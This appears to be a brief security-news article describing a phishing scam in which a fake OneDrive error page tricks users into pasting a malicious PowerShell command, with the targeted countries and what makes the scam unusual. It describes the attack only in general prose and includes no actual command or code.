Cybersecurity experts have discovered a new phishing scam targeting Microsoft OneDrive users. This scam uses tricky social engineering tactics to get users to run a harmful PowerShell script on their computers.
How the Scam Works
- The Email: The scam starts with an email that contains an HTML file.
- Fake OneDrive Page: When you open the file, it shows a fake OneDrive page with an error message saying, "Failed to connect to the 'OneDrive' cloud service. To fix the error, you need to update the DNS cache manually."
- Two Options: The message offers two options: "How to fix" and "Details."
- "Details" leads to a legitimate Microsoft page on DNS troubleshooting.
- "How to fix" asks you to press "Windows Key + X" to open a menu, then launch PowerShell, and paste a command to fix the issue.
- Malicious Command: This command flushes the DNS cache, creates a folder on your C: drive, downloads a file, and runs a harmful script.
Who Is Targeted?
This scam has been found targeting users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K. It shows that phishing attacks are becoming more common and more sophisticated.
How This Scam Is Different
- Complex Instructions: This scam uses detailed instructions to trick users into running a harmful script, unlike simpler phishing attacks that just ask for your login information.
- Trusted Platforms: It uses legitimate-looking pages and trusted platforms like Microsoft OneDrive to fool users.